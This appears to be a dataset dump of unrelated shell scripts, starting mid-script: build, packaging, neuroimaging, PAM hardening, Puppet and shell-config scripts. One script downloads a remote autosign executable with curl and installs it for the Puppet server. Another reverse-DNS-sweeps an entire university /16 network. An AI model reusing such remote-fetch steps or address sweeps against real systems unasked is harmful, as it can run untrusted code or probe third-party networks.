dojar=false
while getopts 'jv:' option
do case "$option" in
v) version="$OPTARG";;
j) dojar=true;;
#[?]) print >&2 $usage
[?]) echo $usage
exit 1;;
esac
done
shift $(($OPTIND - 1))
if [ ! "$1" ]
then
echo "Parameter missing"
echo $usage
exit 1
fi
if [ ! -d "$1" ]; then
echo "Directory not found"
exit 1
fi
currentdate=$(date +%Y%m%d)
fulldate=$(date +%Y%m%d%H%M%S)
tmpdir=_tmp_$fulldate
if [ $version ]
then
extensionname=wmsinspector.$version.$currentdate.xpi
else
extensionname=wmsinspector.$currentdate.xpi
fi
cp -R $1 $tmpdir
cd $tmpdir
if [ $dojar = true ]
then
cd chrome
zip -qrm wmsinspector.jar .
cd ..
sed -i 's/chrome\//jar:chrome\/wmsinspector.jar!\//g' chrome.manifest
fi
zip -qr ../$extensionname . -x .git\*
cd ..
rm -rf $tmpdir
echo "XPI file created: "$extensionname
| true
|
f0c488cb5a524db573a4931b16a10ac8547a3a25
|
Shell
|
nakkumar/aiops
|
/AlienVault/mail-windows-script.sh
|
UTF-8
| 876
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/sh
# mkdir /home/$(whoami)/log
# touch /tmp/data_after1
# touch /tmp/data_before1
sudo tail /var/ossec/logs/alerts/alerts.log > /tmp/data_after1
msg=$(tail /tmp/data_after1)
error=$(tail /tmp/data_after1 | grep 'Win.Test.EICAR_HDB-1' | wc -l)
virus=$(tail /tmp/data_after1 | grep 'Win.Test.EICAR_HDB-1')
if cmp -s /tmp/data_after1 /tmp/data_before1
then
{
echo "NO NEW LOGS"
exit 0
}
else
{
if (( $error>=1 ));then
{
echo "VIRUS FOUND"
cp /tmp/data_after1 /tmp/data_before1
echo "virus Alert --> $virus" | mail -s "windows machine virus Alert" admin@zippyops.in
exit 2
}
else
{
echo "NO VIRUS"
cp /tmp/data_after1 /tmp/data_before1
exit 1
}
fi
}
fi
| true
|
b14a398f42c4987ab4a68fc6c3f6bc3618f3867f
|
Shell
|
inm7/vbc_mri_pipeline
|
/code/examples/train_HarvOxf_96R_gcs_step_1.sh
|
UTF-8
| 3,960
| 3.203125
| 3
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/bash
# train_HarvOxf_96R_gcs.sh
# ------------------------
# grp=HCP
# sbj=101309
grp=${1}
sbj=${2}
fp=/mnt_fp # /p/project/cjinm71/SC_Pipe_jung3/Neuroimage/Tools/freesurfer/subjects
ap=/mnt_ap # /p/project/cjinm71/SC_Pipe_jung3/Neuroimage/Atlas
tp=/mnt_tp # /p/scratch/cjinm71/jung3/03_Structural_Connectivity
atl=HarvardOxford/HarvardOxford-cortl-maxprob-thr0-1mm.nii.gz
mni_brain=/usr/share/fsl/5.0/data/standard/MNI152_T1_1mm_brain.nii.gz
# Call container_SC_dependencies
# ------------------------------
source /usr/local/bin/container_SC_dependencies.sh
export SUBJECTS_DIR=/opt/freesurfer/subjects
# Colors
# ------
RED='\033[1;31m' # Red
GRN='\033[1;32m' # Green
NCR='\033[0m' # No Color
tmp=${tp}/${grp}/${sbj}/temp
# Temporary folder check
# ----------------------
if [[ -d ${tmp} ]]; then
printf "${GRN}[Unix]${RED} ID: ${grp}${sbj}${NCR} - Temporary folder exists, so the process will overwrite the files in the target folder.\n"
else
printf "${GRN}[Unix]${RED} ID: ${grp}${sbj}${NCR} - Create a temporary folder.\n"
mkdir -p ${tmp}
fi
printf "${GRN}[Freesurfer]${RED} ID: ${grp}${sbj}${NCR} - Convert T1 brain: ${tmp}/fs_t1_brain.nii.gz.\n"
mri_convert ${fp}/${grp}_${sbj}/mri/brain.mgz ${tmp}/fs_t1_brain_ori.nii.gz
# AC-PC alignment
# ---------------
robustfov -i ${tmp}/fs_t1_brain_ori.nii.gz -b 170 -m ${tmp}/acpc_roi2full.mat -r ${tmp}/acpc_robustroi.nii.gz
flirt -interp spline -in ${tmp}/acpc_robustroi.nii.gz -ref ${mni_brain} -omat ${tmp}/acpc_roi2std.mat -out ${tmp}/acpc_roi2std.nii.gz -searchrx -30 30 -searchry -30 30 -searchrz -30 30
convert_xfm -omat ${tmp}/acpc_full2roi.mat -inverse ${tmp}/acpc_roi2full.mat
convert_xfm -omat ${tmp}/acpc_full2std.mat -concat ${tmp}/acpc_roi2std.mat ${tmp}/acpc_full2roi.mat
aff2rigid ${tmp}/acpc_full2std.mat ${tmp}/acpc.mat
convert_xfm -omat ${tmp}/acpc_inv.mat -inverse ${tmp}/acpc.mat
applywarp --rel --interp=spline -i ${tmp}/fs_t1_brain_ori.nii.gz -r ${mni_brain} --premat=${tmp}/acpc.mat -o ${tmp}/fs_t1_brain.nii.gz
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - AC-PC alignment: ${tmp}/acpc.mat and ${tmp}/acpc_inv.mat has been calculated.\n"
# Linear transformation from T1-weigted image to the MNI152 T1 1mm
# --------------------------------------------------------------------
flirt -ref ${mni_brain} -in ${tmp}/fs_t1_brain.nii.gz -omat ${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat -dof 12
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Linear transformation: ${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat has been saved.\n"
# Non-linear transformation from T1-weigted image to the MNI152 T1 1mm
# --------------------------------------------------------------------
fnirt --in=${tmp}/fs_t1_brain.nii.gz --aff=${tp}/${grp}/${sbj}/fs_t1_to_mni_affine.mat --cout=${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz --config=T1_2_MNI152_2mm
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Non-linear transformation: ${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz has been saved.\n"
# Apply the deformation to the atlas on the MNI152 T1
# ---------------------------------------------------
invwarp --ref=${tmp}/fs_t1_brain.nii.gz --warp=${tp}/${grp}/${sbj}/fs_t1_to_mni_warp_struct.nii.gz --out=${tp}/${grp}/${sbj}/mni_to_fs_t1_warp_struct.nii.gz
applywarp --ref=${tmp}/fs_t1_brain.nii.gz --in=${ap}/${atl} --warp=${tp}/${grp}/${sbj}/mni_to_fs_t1_warp_struct.nii.gz --out=${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz --interp=nn
applywarp -i ${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz -r ${tmp}/fs_t1_brain_ori.nii.gz -o ${tp}/${grp}/${sbj}/HO_to_fs_t1_ori.nii.gz --premat=${tmp}/acpc_inv.mat --interp=nn
printf "${GRN}[FSL]${RED} ID: ${grp}${sbj}${NCR} - Apply the deformation: ${tp}/${grp}/${sbj}/HO_to_fs_t1.nii.gz has been saved.\n"
# Convert image format and copy to subject image paths
# ----------------------------------------------------
mri_convert ${tp}/${grp}/${sbj}/HO_to_fs_t1_ori.nii.gz ${fp}/${grp}_${sbj}/mri/HarvardOxford_96R.mgz
| true
|
056958823ca45047dc4b6a3523f9ced21a0f23f7
|
Shell
|
josepht/home
|
/bin/bzr_setup.sh
|
UTF-8
| 291
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
set -x
BZR_ROOT=$HOME/src/bzr
for PROJ in $BZR_PROJECTS; do
cd $BZR_ROOT
# Don't bother if the project already exists
if [ -d $PROJ ];then
continue
fi
mkdir $PROJ
cd $PROJ
bzr init-repo .
bzr branch lp:$PROJ trunk
bzr checkout --lightweight trunk current-work
done
| true
|
5df144a63a2ba41c32dbbaa936a60385ed2152cb
|
Shell
|
Soufas/rhel_centos_minimal_starter_package
|
/rhel_centos_starter_kit_minimal/files/nm_disable.sh
|
UTF-8
| 270
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
CHANGES=0
for IFCFG in /etc/sysconfig/network-scripts/ifcfg-* ;do
echo $IFCFG
OCCURENCE=$(grep NM_CONTROLLED $IFCFG |wc -l)
if [ $OCCURENCE == 0 ];
then
echo NM_CONTROLLED=false >> $IFCFG
CHANGES=$[ $CHANGES + 1 ]
fi
done
if [ $CHANGES -eq 0 ];then
exit 1
fi
| true
|
fd57d816fff586c2c3c10e43c4ec954429121319
|
Shell
|
CaeirOps/ec2spot-lambda-dotnet
|
/3-invoke.sh
|
UTF-8
| 415
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
set -eo pipefail
#FUNCTION=$(aws cloudformation describe-stack-resource --stack-name ec2-spot --logical-resource-id function --query 'StackResourceDetail.PhysicalResourceId' --output text)
COUNTER=0
while [ $COUNTER -lt 3 ]; do
aws lambda invoke --function-name lambda-dev-test --region us-east-1 --payload '{"key": "value"}' out.json
cat out.json
echo ""
sleep 2
let COUNTER=COUNTER+1
done
| true
|
4293c0bed775cdb26f8d4fe1798ddd284c041d9a
|
Shell
|
pegasus-isi/ACME-Workflow
|
/plan.sh
|
UTF-8
| 888
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
SITE=local-pbs-titan
OUTPUT_SITE=local-pbs-titan
if [ $# -ne 1 ]; then
echo "Usage: $0 WORKFLOW_DIR"
exit 1
fi
WORKFLOW_DIR=$1
if [ -d "$WORKFLOW_DIR" ]; then
WORKFLOW_DIR=$(cd $WORKFLOW_DIR && pwd)
else
echo "No such directory: $WORKFLOW_DIR"
exit 1
fi
source $WORKFLOW_DIR/env.sh
DIR=$(cd $(dirname $0) && pwd)
SUBMIT_DIR=$WORKFLOW_DIR/submit
DAX=$WORKFLOW_DIR/dax.xml
TC=$WORKFLOW_DIR/tc.txt
RC=$WORKFLOW_DIR/rc.txt
SC=$DIR/sites.xml
PP=$DIR/pegasus.properties
echo "Planning workflow..."
pegasus-plan \
-Dpegasus.metrics.app=acme \
-Dpegasus.catalog.site.file=$SC \
-Dpegasus.catalog.replica=File \
-Dpegasus.catalog.replica.file=$RC \
-Dpegasus.catalog.transformation.file=$TC \
--conf $PP \
--dax $DAX \
--dir $SUBMIT_DIR \
--sites $SITE \
--output-site $OUTPUT_SITE \
--cleanup none \
--force
| true
|
cec223d59676e41e6c2a52b3dbd32a2822abbf6b
|
Shell
|
JayPhil2k19/main
|
/scr/auto-install.sh
|
UTF-8
| 1,438
| 3.78125
| 4
|
[] |
no_license
|
#! /bin/bash
# Simple interactive system-setup menu: inspect (and eventually install)
# a small list of packages via apt.

# Top-level menu: dispatches to the install/info sub-menus.
menu_fnc(){
clear
echo "System Setup Utility!"
PS3='Please make selection: '
local men_opt_ary=( "Install Software" "Information" "Exit")
local men_cho=
select men_cho in "${men_opt_ary[@]}"
do
case $men_cho in
"Install Software") install_fnc;;
"Information") info_fnc;;
"Exit") exit;;
*) echo "Invalid choice" ;;
esac
done
clear
return 0
}

# Setup Functions
# Sub-menu: show package details before installation.
install_fnc(){
clear
echo "Select software to install: "
PS3='Please make selection: '
# NOTE: labels must match the case arms below exactly
# (was "CarioDock", which never matched the "Cairo Dock" arm).
local ins_opt_ary=( "Espeak" "Variety" "Virtual Box" "Cairo Dock" "Back <<" )
local ins_cho=
select ins_cho in "${ins_opt_ary[@]}"
do
sudo ls > /dev/null   # prime the sudo credential cache up front
case $ins_cho in
"Espeak") clear ; apt show espeak | more ; echo "Install?";;
"Variety") clear ; apt show variety | more;;
"Virtual Box") clear ; apt show virtualbox | more;;
"Cairo Dock") clear ; apt show cairo-dock | more;;
"Back <<") clear ; menu_fnc;;
*) echo "Invalid selection." ;;
esac
done
return 0
}

# Sub-menu: show package information only.
info_fnc(){
clear
echo "Software List: "
PS3='Please make selection: '
local inf_opt_ary=( "Espeak" "Variety" "Virtual Box" "Cairo Dock" "Back <<" )
local inf_cho=
# was "${info_opt_ary[@]}" (undefined) -- the menu rendered empty.
select inf_cho in "${inf_opt_ary[@]}"
do
case $inf_cho in
"Espeak") clear ; apt show espeak;;
"Variety") clear ; apt show variety;;
"Virtual Box") clear ; apt show virtualbox;;
"Cairo Dock") clear ; apt show cairo-dock;;
"Back <<") clear ; menu_fnc;;
*) echo "Invalid selection" ;;
esac
done
return 0
}
menu_fnc
| true
|
9120947ccf0d9bbba9d1a1b294404ce7c9eb2701
|
Shell
|
riterdando/dotfiles
|
/.bashrc
|
UTF-8
| 3,837
| 3.25
| 3
|
[] |
no_license
|
# -----------------------------------------------------------------------------
# Bash configuration, derived from SuSe sample .bashrc.
#
# There are 3 different types of shells in bash: the login shell, normal shell
# and interactive shell. Login shells read ~/.profile and interactive shells
# read ~/.bashrc; in our setup, /etc/profile sources ~/.bashrc - thus all
# settings made here will also take effect in a login shell.
#
# NOTE: It is recommended to make language settings in ~/.profile rather than
# here, since multilingual X sessions would not work properly if LANG is over-
# ridden in every subshell.
# -----------------------------------------------------------------------------
# ----- path settings ---------------------------------------------------------
PATH="${HOME}/bin:${PATH}"
# ----- additional Bash completions -------------------------------------------
if [[ -d ~/bash_completion.d/ ]] && \
! find ~/bash_completion.d/. ! -name . -prune -exec false {} +
then
for f in ~/bash_completion.d/*
do
source "$f"
done
fi
# somehow the fzf completions are not loaded automatically (we fix this later...)
source /usr/share/bash-completion/completions/fzf
source /usr/share/bash-completion/completions/fzf-key-bindings
# Gradle specifics
export GRADLE_COMPLETION_UNQUALIFIED_TASKS="true"
# ----- aliases settings ------------------------------------------------------
test -s ~/.alias && . ~/.alias || true
# enable color and hyperlinks, in order to make the links work with Kitty
alias ls='ls --color=auto --hyperlink=auto'
# enable displaying pictures in the terminal
alias icat='kitty +kitten icat'
# emacs related aliases
alias et='emacsclient -t'
alias en='emacsclient -c -n'
# ----- Emacs as default editor with daemon support --------------------------
export EDITOR="emacsclient -c -n"
export ALTERNATE_EDITOR=""
# ----- Powerline-Go command line prompt for Bash -----------------------------
function _update_ps1() {
PS1="$(${HOME}/bin/powerline-go -newline -hostname-only-if-ssh -numeric-exit-codes -cwd-max-depth 7 -error $?)"
}
if [ "$TERM" != "linux" ] && [ -f "${HOME}/bin/powerline-go" ]; then
PROMPT_COMMAND="_update_ps1; $PROMPT_COMMAND"
fi
# ----- Fuzzy Finder (fzf) ---------------------------------------------------
# Available keybindings:
# CTRL-T - Paste the selected files and directories onto the command-line
# Set FZF_CTRL_T_COMMAND to override the default command
# Set FZF_CTRL_T_OPTS to pass additional options
# CTRL-R - Paste the selected command from history onto the command-line
# If you want to see the commands in chronological order, press CTRL-R again which toggles sorting by relevance
# Set FZF_CTRL_R_OPTS to pass additional options
# ALT-C - cd into the selected directory
# Set FZF_ALT_C_COMMAND to override the default command
# Set FZF_ALT_C_OPTS to pass additional options
# using 'fd' as find tool...
export FZF_DEFAULT_COMMAND="fd --hidden --exclude '.git'"
export FZF_CTRL_T_COMMAND="$FZF_DEFAULT_COMMAND"
export FZF_ALT_C_COMMAND="$FZF_DEFAULT_COMMAND --type d"
# customize the fzf default options
export FZF_DEFAULT_OPTS="
--layout=reverse
--info=inline
--height=80%
--multi
--preview-window=:hidden
--preview '([[ -f {} ]] && (bat --style=numbers --color=always {} || cat {})) || ([[ -d {} ]] && (tree -C {} | less)) || echo {} 2> /dev/null | head -200'
--color='hl:148,hl+:154,pointer:032,marker:010,bg+:237,gutter:008'
--prompt='∼ ' --pointer='▶' --marker='✓'
--bind '?:toggle-preview'
--bind 'ctrl-a:select-all'
--bind 'ctrl-e:execute(emacsclient -c -n {+})'
"
# ----- broot -----------------------------------------------------------------
# (Try this out, may not be used due to fzf...)
source ${HOME}/.config/broot/launcher/bash/br
| true
|
7f44a0c60b824d6e84fe6e3e085bb36c8349854c
|
Shell
|
AutomateCompliance/complianceascode-content
|
/build-oval510/rhv4/fixes/bash/accounts_passwords_pam_faillock_interval.sh
|
UTF-8
| 2,986
| 3.46875
| 3
|
[
"BSD-3-Clause"
] |
permissive
|
# platform = multi_platform_rhel,multi_platform_fedora,multi_platform_ol,multi_platform_rhv
# Remediation is applicable only in certain platforms
if rpm --quiet -q pam; then
var_accounts_passwords_pam_faillock_fail_interval="(bash-populate var_accounts_passwords_pam_faillock_fail_interval)"
AUTH_FILES=("/etc/pam.d/system-auth" "/etc/pam.d/password-auth")
for pam_file in "${AUTH_FILES[@]}"
do
# is auth required pam_faillock.so preauth present?
if grep -qE '^\s*auth\s+required\s+pam_faillock\.so\s+preauth.*$' "$pam_file" ; then
# is the option set?
if grep -qE '^\s*auth\s+required\s+pam_faillock\.so\s+preauth.*'"fail_interval"'=([0-9]*).*$' "$pam_file" ; then
# just change the value of option to a correct value
sed -i --follow-symlinks 's/\(^auth.*required.*pam_faillock.so.*preauth.*silent.*\)\('"fail_interval"' *= *\).*/\1\2'"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
# the option is not set.
else
# append the option
sed -i --follow-symlinks '/^auth.*required.*pam_faillock.so.*preauth.*silent.*/ s/$/ '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
fi
# auth required pam_faillock.so preauth is not present, insert the whole line
else
sed -i --follow-symlinks '/^auth.*sufficient.*pam_unix.so.*/i auth required pam_faillock.so preauth silent '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval" "$pam_file"
fi
# is auth default pam_faillock.so authfail present?
if grep -qE '^\s*auth\s+(\[default=die\])\s+pam_faillock\.so\s+authfail.*$' "$pam_file" ; then
# is the option set?
if grep -qE '^\s*auth\s+(\[default=die\])\s+pam_faillock\.so\s+authfail.*'"fail_interval"'=([0-9]*).*$' "$pam_file" ; then
# just change the value of option to a correct value
sed -i --follow-symlinks 's/\(^auth.*[default=die].*pam_faillock.so.*authfail.*\)\('"fail_interval"' *= *\).*/\1\2'"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
# the option is not set.
else
# append the option
sed -i --follow-symlinks '/^auth.*[default=die].*pam_faillock.so.*authfail.*/ s/$/ '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval"'/' "$pam_file"
fi
# auth default pam_faillock.so authfail is not present, insert the whole line
else
sed -i --follow-symlinks '/^auth.*sufficient.*pam_unix.so.*/a auth [default=die] pam_faillock.so authfail '"fail_interval"'='"$var_accounts_passwords_pam_faillock_fail_interval" "$pam_file"
fi
if ! grep -qE '^\s*account\s+required\s+pam_faillock\.so.*$' "$pam_file" ; then
sed -E -i --follow-symlinks '/^\s*account\s*required\s*pam_unix.so/i account required pam_faillock.so' "$pam_file"
fi
done
else
>&2 echo 'Remediation is not applicable, nothing was done'
fi
| true
|
c2922b370026e3b61305657dffe6251b1b6a2329
|
Shell
|
pro-gramma/cisc220_2
|
/queensuComputingSubdomainFinder.sh
|
UTF-8
| 271
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
# James Neverson 10193581
# Sweep 130.15.0.0/16, reverse-resolving every address and printing the
# ones whose PTR record belongs to cs.queensu.ca.
# (Shebang fixed: it was "#!bin/bash" -- missing leading slash -- which
# only worked when the script was invoked explicitly as "bash script.sh".)
echo -e "IP Address\tSub-Domain"
for ((i=0;i<=255;i++)); do
	for ((ii=0;ii<=255;ii++)); do
		# Capture nslookup's whitespace-split output; field 9 holds the
		# resolved name on a successful PTR lookup.
		# NOTE(review): this index is layout-dependent across nslookup versions.
		output=($(nslookup "130.15.${i}.${ii}"))
		if [[ "${output[9]}" == *"cs.queensu.ca." ]]; then
			echo -e "130.15.${i}.${ii}\t${output[9]}"
		fi
	done
done
| true
|
40b3112ba894d02f3db627780ec4cecd618754ba
|
Shell
|
termux/termux-packages
|
/packages/rhash/build.sh
|
UTF-8
| 1,438
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
TERMUX_PKG_HOMEPAGE=https://github.com/rhash/RHash
TERMUX_PKG_DESCRIPTION="Console utility for calculation and verification of magnet links and a wide range of hash sums"
TERMUX_PKG_LICENSE="MIT"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=1.4.4
TERMUX_PKG_SRCURL=https://github.com/rhash/RHash/archive/v$TERMUX_PKG_VERSION.tar.gz
TERMUX_PKG_SHA256=8e7d1a8ccac0143c8fe9b68ebac67d485df119ea17a613f4038cda52f84ef52a
TERMUX_PKG_AUTO_UPDATE=true
TERMUX_PKG_DEPENDS="openssl"
TERMUX_PKG_CONFLICTS="librhash, rhash-dev"
TERMUX_PKG_REPLACES="librhash, rhash-dev"
TERMUX_PKG_BUILD_IN_SRC=true
termux_step_configure() {
CFLAGS="-DOPENSSL_RUNTIME -DSYSCONFDIR=\"${TERMUX_PREFIX}/etc\" $CPPFLAGS $CFLAGS"
./configure \
--prefix=$TERMUX_PREFIX \
--disable-static \
--enable-lib-static \
--enable-lib-shared \
--cc=$CC
}
termux_step_make() {
make -j $TERMUX_MAKE_PROCESSES \
ADDCFLAGS="$CFLAGS" \
ADDLDFLAGS="$LDFLAGS"
}
termux_step_make_install() {
make install install-pkg-config
make -C librhash install-lib-headers
ln -sf $TERMUX_PREFIX/lib/librhash.so.1 $TERMUX_PREFIX/lib/librhash.so
}
termux_step_post_massage() {
# Do not forget to bump revision of reverse dependencies and rebuild them
# after SOVERSION is changed.
local _SOVERSION_GUARD_FILES="lib/librhash.so.1"
local f
for f in ${_SOVERSION_GUARD_FILES}; do
if [ ! -e "${f}" ]; then
termux_error_exit "SOVERSION guard check failed."
fi
done
}
| true
|
ab86fb5a9f6b3c6249ba658f11a80a672b5a87f3
|
Shell
|
petronny/aur3-mirror
|
/kf5-akonadi/PKGBUILD
|
UTF-8
| 932
| 2.71875
| 3
|
[] |
no_license
|
# Maintainer: Andrea Scarpino <andrea@archlinux.org>
pkgname=kf5-akonadi
pkgver=1.12.1
pkgrel=1
pkgdesc="PIM layer, which provides an asynchronous API to access all kind of PIM data"
arch=('i686' 'x86_64')
url='http://community.kde.org/KDE_PIM/Akonadi'
license=('LGPL')
depends=('shared-mime-info' 'boost-libs' 'mariadb' 'qt5-base' 'libxslt')
makedepends=('cmake' 'boost' 'postgresql')
optdepends=('postgresql: PostgreSQL backend')
install="${pkgname}.install"
conflicts=('akonadi-qt5')
source=("http://download.kde.org/stable/akonadi/src/akonadi-${pkgver}.tar.bz2")
md5sums=('9a4a99d10e003a267a515fc60de4f817')
prepare() {
mkdir build
}
build() {
cd build
cmake ../akonadi-${pkgver} \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=/opt/kf5 \
-DINSTALL_QSQLITE_IN_QT_PREFIX=TRUE \
-DAKONADI_BUILD_TESTS=OFF \
-DQT5_BUILD=ON \
-DWITH_SOPRANO=OFF
make
}
package() {
cd build
make DESTDIR="${pkgdir}" install
}
| true
|
57698ff0d5736ce927af0c080d64ce3ea1f8f0d0
|
Shell
|
fastZhe/common
|
/linux/losePacket/losePacket.sh
|
UTF-8
| 1,109
| 3.71875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#set -x
# Ping every host listed in the input file and sort them into
# success_ip.txt / failture_ip.txt by packet-loss percentage.
# Usage: losePacket.sh <ipfile> [loss-threshold-percent]
. ./log.sh
basepath=$(cd "$(dirname "$0")"; pwd)
baselevel=100          # default threshold (%): only total loss counts as failure
ips=$1
if [ -z "$ips" ]; then
	echo "[use $0 ipfile or $0 ipfile [50]]"
	exit 1
fi
if [ -n "$2" ]; then
	baselevel=$2
fi
echo >./failture_ip.txt
echo >./success_ip.txt
############################################################
##########ping  tools #################################
############################################################
# Read IPs (one per line) from the file given in $1 and classify each
# host by its measured loss rate.
function pingFun(){
	file=$1
	while read -r ip
	do
		log info "$ip"
		# Escape $ so the log shows the literal awk program (it used to expand).
		log info "cmd : ping -c 100 -i 0 $ip | grep 'packet loss' | awk -F \",\" '{print \$(NF-1)}' | awk '{print \$1}' "
		rate=$(ping -c 100 -i 0 "$ip" | grep 'packet loss' | awk -F "," '{print $(NF-1)}' | awk '{print $1}')
		rate=${rate%\%*}
		log info "$rate"
		# An unparsable rate means ping failed outright; treat as 100% loss
		# instead of crashing the numeric test below.
		[ -z "$rate" ] && rate=100
		if [ "$rate" -ge "$baselevel" ]; then
			log error "$ip lose packet $rate%"
			# was: echo "$ip\n" -- bash echo prints the backslash-n literally
			echo "$ip" >>./failture_ip.txt
		else
			echo "$ip" >>./success_ip.txt
		fi
	done < "$file"
}

# start ping .......
pingFun "$basepath/$ips"
| true
|
2e2372dff5a3dd220e76ad221233e03b021fb52e
|
Shell
|
lbflyseed/build
|
/mk-spinor-fw.sh
|
UTF-8
| 4,115
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash -e
if [ ! $_TARGET_CHIP ] ; then
echo "source build/envsetup.sh firstly"
exit -1
fi
img_name=${_TARGET_PLATFORM}-${_TARGET_OS}-${_TARGET_BOARD}-spinor.img
source build/setting.mk
pack_dir=${TOOLS_DIR}/pack
pack_tools_dir=${pack_dir}/pctools/linux
board_out_dir=${OUT_DIR}/${_TARGET_PLATFORM}/${_TARGET_BOARD}
pack_out_dir=${board_out_dir}/pack
plat_dir=$DEVICE_DIR/$_TARGET_PLATFORM
export PATH=${pack_tools_dir}/mod_update:${pack_tools_dir}/openssl:${pack_tools_dir}/eDragonEx:${pack_tools_dir}/fsbuild200:${pack_tools_dir}/android:$PATH
tools_file_list=(
common/tools/split_xxxx.fex
common/tools/usbtool_test.fex
common/tools/cardscript.fex
common/tools/cardscript_secure.fex
common/tools/cardtool.fex
common/tools/usbtool.fex
common/tools/aultls32.fex
common/tools/aultools.fex
)
configs_file_list=(
common/toc/toc1.fex
common/toc/toc0.fex
common/toc/boot_package.fex
common/dtb/sunxi.fex
common/hdcp/esm.fex
)
boot_file_list=(
bootloader/boot0_nand.bin:${pack_out_dir}/boot0_nand.fex
bootloader/boot0_sdcard.bin:${pack_out_dir}/boot0_sdcard.fex
bootloader/boot0_spinor.bin:${pack_out_dir}/boot0_spinor.fex
bootloader/fes1.bin:${pack_out_dir}/fes1.fex
bootloader/u-boot.bin:${pack_out_dir}/u-boot.fex
bootloader/u-boot-spinor.bin:${pack_out_dir}/u-boot-spinor.fex
bootloader/cpus_pm_binary.code:${pack_out_dir}/cpus_pm_binary.code
bootloader/scp.bin:${pack_out_dir}/scp.fex
bootloader/sboot.bin:${pack_out_dir}/sboot.fex
bootloader/boot_logo.fex:${pack_out_dir}/boot_logo.fex
)
function do_prepare()
{
rm -rf $pack_out_dir
mkdir -p $pack_out_dir
printf "copying tools file\n"
for file in ${tools_file_list[@]} ; do
cp -f $pack_dir/$file $pack_out_dir > /dev/null
done
printf "copying configs file\n"
for file in ${configs_file_list[@]} ; do
cp -f $pack_dir/$file $pack_out_dir > /dev/null
done
cp -rf $plat_dir/configs/* $pack_out_dir
printf "copying bootloader\n"
for file in ${boot_file_list[@]} ; do
cp -f $plat_dir/`echo $file | awk -F':' '{print $1}'` \
`echo $file | awk -F':' '{print $2}'`
done
cp -rf $plat_dir/bootloader/boot-res $pack_out_dir
cp -rf $plat_dir/bootloader/boot-res.ini $pack_out_dir
cp -rf $plat_dir/boards/$_TARGET_BOARD/configs/* $pack_out_dir
pushd $pack_out_dir > /dev/null
printf "parsing sys_config.fex\n"
busybox unix2dos sys_config.fex
script sys_config.fex > /dev/null
cp -f sys_config.bin config.fex
printf "update nor bootloader\n"
update_boot0 boot0_spinor.fex sys_config.bin SDMMC_CARD > /dev/null
update_uboot u-boot-spinor.fex sys_config.bin > /dev/null
printf "update nand and sdcard bootloader\n"
update_boot0 boot0_nand.fex sys_config.bin NAND > /dev/null
update_boot0 boot0_sdcard.fex sys_config.bin SDMMC_CARD > /dev/null
update_uboot u-boot.fex sys_config.bin > /dev/null
update_fes1 fes1.fex sys_config.bin > /dev/null
# Uncomment if using FAT filesystem at boot resource partition
printf "generating boot-res.fex\n"
fsbuild boot-res.ini split_xxxx.fex > /dev/null
printf "generating env.fex\n"
u_boot_env_gen env.cfg env.fex > /dev/null
ln -sf ${board_out_dir}/kernel/uImage kernel.fex
ln -sf ${board_out_dir}/rootfs.squashfs rootfs.fex
printf "parsing sys_partition_spinor.fex\n"
busybox unix2dos sys_partition_spinor.fex
script sys_partition_spinor.fex > /dev/null
printf "generating sunxi-mbr for spinor\n"
cp sys_partition_spinor.bin sys_partition.bin
update_mbr sys_partition.bin 1 > /dev/null
printf "generating full_img.fex\n"
merge_package full_img.fex \
boot0_spinor.fex \
u-boot-spinor.fex \
sunxi_mbr.fex \
sys_partition.bin > /dev/null
ln -sf ${board_out_dir}/kernel/vmlinux.tar.bz2 vmlinux.fex
popd > /dev/null
}
function do_pack()
{
echo "imagename = $img_name" >> $pack_out_dir/image_spinor.cfg
echo "" >> $pack_out_dir/image_spinor.cfg
pushd $pack_out_dir > /dev/null
dragon image_spinor.cfg sys_partition_spinor.fex
if [ $? -eq 0 -a -e $img_name ] ; then
mv $img_name ../
echo '-------- image is at --------'
echo -e '\033[0;31;1m'
echo ${board_out_dir}/${img_name}
echo -e '\033[0m'
fi
popd > /dev/null
}
do_prepare
do_pack
| true
|
044e43adecb32b80189f48d2ce4ae42e8b494493
|
Shell
|
zoojar/tf-puppet
|
/scripts/configure_autosigning_foss.sh
|
UTF-8
| 684
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# Script to configure autosigning on PE 2016.5.1. Accepts one argument: the PSK - written into /etc/puppetlabs/puppet/global-psk.
psk=$1
autosign_exe_url="https://raw.githubusercontent.com/zoojar/classified/master/autosign.sh"
echo "Configuring policy-based autosigning..."
# Persist the pre-shared key where the autosign policy script expects it.
echo $psk >/etc/puppetlabs/puppet/global-psk
# Fetch the policy executable and lock it down: read/execute only, owned
# by the puppet user so the puppetserver can run it.
curl -L "${autosign_exe_url}" > /etc/puppetlabs/puppet/autosign.sh
chmod 500 /etc/puppetlabs/puppet/autosign.sh ; sudo chown puppet /etc/puppetlabs/puppet/autosign.sh
# Cover both PE and FOSS install layouts when locating the puppet CLI.
PATH="/opt/puppetlabs/bin:/opt/puppetlabs/puppet/bin:/opt/puppet/bin:$PATH"
